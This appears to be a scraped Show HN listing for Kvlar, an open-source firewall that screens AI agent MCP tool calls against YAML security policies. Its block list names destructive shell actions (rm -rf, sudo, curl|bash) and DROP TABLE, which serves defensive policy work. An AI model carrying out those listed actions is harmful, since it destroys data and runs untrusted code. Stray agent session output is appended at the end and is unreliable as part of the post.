Kvlar – Open-source firewall for AI agent tool calls

Name: Kvlar – Open-source firewall for AI agent tool calls
Availability: InStock
Author: kvlar

by kvlar·Mar 4, 2026·1 point·0 comments

Visit Project View on HN

AI Analysis

●●●BangerSolve My ProblemShip It

Fail-closed MCP security policy layer with curated templates and policy-as-code YAML.

Strengths

•Fills real gap—Claude Desktop's per-call approve/deny has no persistence, automation, or audit; Kvlar adds deterministic policy engine
•Curated policy templates (Postgres, filesystem) reduce cold-start friction; kvlar test validates policies in CI
•Stdio proxy design means zero changes to existing MCP servers; wrapping is transparent and reversible

Weaknesses

•Extremely early (0 GitHub stars, just shipped); no evidence of production use or ecosystem adoption yet
•Policy test coverage shown only for Postgres; generalization to other MCP servers unproven

Post Description

Hey HN, I built Kvlar — an open-source policy engine that sits between AI agents and their tools (MCP servers), evaluating every tool call against YAML security policies before execution.

The problem: AI agents using MCP can execute database queries, push code, send Slack messages, and run shell commands — with no security boundary. Claude Desktop has basic approve/deny, but it's per-call with no persistent rules, no automation, and no audit trail.

How it works: Kvlar runs as a stdio proxy between the agent and the MCP server. You define policies in YAML — allow, deny, or require human approval — and Kvlar enforces them deterministically. Fail-closed: if no rule matches, the action is denied.

kvlar init --template postgres # curated policy (11 rules) kvlar wrap # inject proxy into Claude Desktop kvlar test -f policy.test.yaml # verify your policy in CI

What it catches today:

Postgres: blocks DROP TABLE, gates INSERT/UPDATE, allows SELECT GitHub: blocks repo creation, gates force-push and merges, allows reads Slack: gates message sending, allows channel reads Shell: blocks rm -rf, sudo, curl|bash — gates installs, allows ls/cat/grep Technical details:

Written in Rust (4 crates), pure policy engine with zero I/O 100+ policy tests Policy composition via extends — build on top of curated templates (docker compose style) Works with Claude Desktop

Apache 2.0 Website: https://kvlar.io Install: cargo install kvlar-cli

I'd love feedback on the policy design and what MCP servers you'd want covered next.

Updated todo list with completed tasks and configurations Updated todo list with completed tasks and configurations

Summary of everything done this session:

Task Status Favicon fixed (monospace K + cyan underline) Deployed --config <path> flag on wrap/unwrap Pushed to GitHub Docs page updated (cargo install, 8 templates, parameter matching, --config, --dir, all servers in MCP compat) Deployed Landing page rule count fixed (28 not 30) Deployed Full revalidation: 91 unit tests + 105 policy tests, all 8 templates init+validate, wrap/unwrap E2E with --config All passing SDK pushed to kvlar-io/kvlar Done Website deployed to Vercel Done Show HN draft Above Before posting: Make the kvlar-io/kvlar repo public on GitHub.

Preview Screenshot Tool output

Let me also check the home page and favicon.

Executed JavaScript to redirect to home page Executed JavaScript to redirect to home page Preview Screenshot Tool output

Everything looks correct — landing page rendering properly with the hero, metrics bar (196 tests, 8 server policies), and the docs page showing the updated CLI reference with --config flag. The changes are verified and already deployed to Vercel.